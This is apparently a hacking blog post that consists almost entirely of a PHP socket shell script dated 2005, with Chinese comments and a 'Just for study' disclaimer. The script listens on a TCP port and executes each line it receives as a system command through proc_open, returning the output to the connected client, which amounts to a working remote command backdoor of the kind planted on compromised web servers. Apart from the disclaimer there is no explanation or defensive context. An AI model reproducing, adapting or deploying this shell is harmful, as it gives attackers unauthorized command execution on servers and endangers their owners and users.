H4x0r's Blog

<?php
//
//PHPSocketShell
//Version 1.0 Date:2005-07-22
//Codz by darkne2s&wofeiwo, thx darkne2s' help :)
//Just for study
//
error_reporting(E_ALL); // 关闭脚本时间限制，使php能够阻塞操作socket
set_time_limit(0);
ob_implicit_flush();

if (!extension_loaded('sockets')) {
 dl('php_sockets.dll') or die ('Unable dl php_sockets.dll');
}

// bind的地址与端口
$address = '127.0.0.1';
$port = 3333;

if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) < 0) {
 echo "socket_create() failed: reason: " . socket_strerror($sock) . "\n";
}
if (($ret = socket_bind($sock, $address, $port)) < 0) {
 echo "socket_bind() failed: reason: " . socket_strerror($ret) . "\n";
}
if (($ret = socket_listen($sock, 5)) < 0) {
 echo "socket_listen() failed: reason: " . socket_strerror($ret) . "\n";
}
do {
 if (($msgsock = socket_accept($sock)) < 0) {
 echo "socket_accept() failed: reason: " . socket_strerror($msgsock) . "\n";
 break;
 }
 $descriptorspec = array(
 0 => array("pipe", "r"), // stdin 标准输入，读管道
 1 => array("pipe", "w"), // stdout 标准输出，写管道
 2 => array("pipe", "w") // stderr 标准错误输出
 );

 $msg = "Welcome to the PHPCMDSHELL!\r\n";
 if (strlen($msg) != 0){
 socket_write($msgsock, $msg, strlen($msg));
 }
 do {
 if (false === socket_recv($msgsock, $buf , 1024, 0)) {
 echo "客户端已经退出\n";
 break 2;
 }
 if (!$buf = trim($buf)) {
 continue;
 }
 if ($buf == 'quit') {
 break;
 }
 if ($buf == 'shutdown') {
 fclose($pipes[0]);
 fclose($pipes[1]);
 proc_close($process);
 socket_close($msgsock);
 break 2;
 }
 $process = proc_open($buf, $descriptorspec, $pipes);
 fwrite($pipes[0], "".$buf."\r\n");
 while (!feof($pipes[1])) {
 $msg = fread($pipes[1], 1024);
 socket_write($msgsock, $msg, strlen($msg));
 }
 } while (true);

 fclose($pipes[0]); // 关闭管道是个好习惯 ：）
 fclose($pipes[1]);
 proc_close($process);
 socket_close($msgsock);
} while (true);

socket_close($sock);
?>